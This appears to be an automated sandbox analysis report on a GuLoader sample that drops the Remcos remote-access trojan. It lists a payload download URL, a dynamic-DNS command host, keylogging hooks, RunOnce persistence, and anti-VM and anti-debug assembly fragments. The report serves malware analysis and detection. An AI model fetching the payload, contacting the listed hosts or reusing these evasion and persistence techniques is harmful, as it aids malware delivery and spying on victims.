Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"} |
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe |
ReversingLabs: Detection: 17% |
Source: JXblq0dqPN.exe |
Virustotal: Detection: 35% |
Source: JXblq0dqPN.exe |
ReversingLabs: Detection: 17% |
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe |
Joe Sandbox ML: detected |
Source: JXblq0dqPN.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE DANILENKODE |
Source: Joe Sandbox View |
ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
DNS traffic detected: queries for: clientconfig.passport.net |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 NtWriteVirtualMemory, |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226904A NtProtectVirtualMemory, |
1_2_0226904A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022658B5 NtAllocateVirtualMemory, |
1_2_022658B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226483C NtWriteVirtualMemory, |
1_2_0226483C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264A0A NtWriteVirtualMemory, |
1_2_02264A0A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264C62 NtWriteVirtualMemory, |
1_2_02264C62 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022646B5 NtWriteVirtualMemory, |
1_2_022646B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF NtWriteVirtualMemory, |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226473E NtWriteVirtualMemory, |
1_2_0226473E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265983 NtAllocateVirtualMemory, |
1_2_02265983 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BEB NtWriteVirtualMemory, |
1_2_02264BEB |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02268FFF NtProtectVirtualMemory, |
1_2_02268FFF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BC5 NtWriteVirtualMemory, |
1_2_02264BC5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022658B5 |
1_2_022658B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022624E2 |
1_2_022624E2 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022620EC |
1_2_022620EC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226950D |
1_2_0226950D |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260557 |
1_2_02260557 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260BF8 |
1_2_02260BF8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260223 |
1_2_02260223 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226483C |
1_2_0226483C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264A0A |
1_2_02264A0A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264214 |
1_2_02264214 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264C62 |
1_2_02264C62 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02266475 |
1_2_02266475 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260647 |
1_2_02260647 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260641 |
1_2_02260641 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226885F |
1_2_0226885F |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022646B5 |
1_2_022646B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022614B3 |
1_2_022614B3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022626BA |
1_2_022626BA |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263896 |
1_2_02263896 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267E98 |
1_2_02267E98 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022628E2 |
1_2_022628E2 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022680FC |
1_2_022680FC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265CD0 |
1_2_02265CD0 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262D2C |
1_2_02262D2C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226473E |
1_2_0226473E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260D0E |
1_2_02260D0E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260708 |
1_2_02260708 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226951E |
1_2_0226951E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226111B |
1_2_0226111B |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02268764 |
1_2_02268764 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263D6D |
1_2_02263D6D |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267776 |
1_2_02267776 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260B71 |
1_2_02260B71 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262F7B |
1_2_02262F7B |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263147 |
1_2_02263147 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262F54 |
1_2_02262F54 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022615A5 |
1_2_022615A5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263FA3 |
1_2_02263FA3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267FAE |
1_2_02267FAE |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265D82 |
1_2_02265D82 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226218A |
1_2_0226218A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267BEC |
1_2_02267BEC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BEB |
1_2_02264BEB |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BC5 |
1_2_02264BC5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022637C8 |
1_2_022637C8 |
Source: JXblq0dqPN.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: ANNONCEKAMPAGNE.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@3/3@164/3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMP |
Source: JXblq0dqPN.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: unknown |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Source: Yara match |
File source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_00401367 pushfd ; iretd |
1_2_0040136A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_00403268 pushfd ; iretd |
1_2_0040326E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226A0E4 push FFFFFFD2h; iretd |
1_2_0226A0E9 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 17_2_0056A0E4 push FFFFFFD2h; iretd |
17_2_0056A0E9 |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08584386702 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 NtWriteVirtualMemory, |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 LoadLibraryA, |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260BF8 TerminateProcess,LoadLibraryA, |
1_2_02260BF8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF NtWriteVirtualMemory, |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL") |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov edx, dword ptr [ebp+0000027Ah] 0x00000009 push 64FFFEF9h 0x0000000e add dword ptr [esp], 9B136642h 0x00000015 xor dword ptr [esp], 8588ACC3h 0x0000001c xor dword ptr [esp], 859BC9F8h 0x00000023 cmp cx, cx 0x00000026 push dword ptr [ebp+50h] 0x00000029 call 00007F7648791C6Eh 0x0000002e call 00007F764878CCF5h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F764878CDD9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000000d mov eax, ebp 0x0000000f add eax, 0000010Ch 0x00000014 mov dword ptr [ebp+0000021Ch], edi 0x0000001a mov edi, eax 0x0000001c push edi 0x0000001d mov edi, dword ptr [ebp+0000021Ch] 0x00000023 push dword ptr [ebp+000000FCh] 0x00000029 call 00007F7648A653A9h 0x0000002e call 00007F7648A60805h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F7648A608E9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax 0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl 0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh 0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch 0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh 0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] 0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h 0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx 0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi 0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 0x00000083 pushad 0x00000084 mov ebx, 000000A7h 0x00000089 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ecx 0x00000004 mov ecx, dword ptr [ebp+000001D9h] 0x0000000a mov dword ptr [ebp+00000212h], ecx 0x00000010 mov ecx, eax 0x00000012 push ecx 0x00000013 mov ecx, dword ptr [ebp+00000212h] 0x00000019 push dword ptr [ebp+000000D0h] 0x0000001f call 00007F7648790371h 0x00000024 call 00007F764878CCF5h 0x00000029 pop ebx 0x0000002a sub ebx, 05h 0x0000002d mov dword ptr [ebp+0000014Ch], edi 0x00000033 jmp 00007F764878CDD9h 0x00000038 pushad 0x00000039 mov esi, 00000069h 0x0000003e rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084 |
Thread sleep time: -35000s >= -30000s |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 |
Thread sleep count: 250 > 30 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 |
Thread sleep time: -125000s >= -30000s |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Last function: Thread delayed |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell") |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Thread information set: HideFromDebugger |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process queried: DebugPort |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022664DD LdrInitializeThunk, |
1_2_022664DD |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h] |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267874 mov eax, dword ptr fs:[00000030h] |
1_2_02267874 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267879 mov eax, dword ptr fs:[00000030h] |
1_2_02267879 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h] |
1_2_022654A8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h] |
1_2_02262D2C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267377 mov eax, dword ptr fs:[00000030h] |
1_2_02267377 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h] |
1_2_022637C8 |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: uProgram Manager |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: logs.dat.17.dr |
Binary or memory string: [ Program Manager ] |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: Initial file |
Signature Results: GuLoader behavior |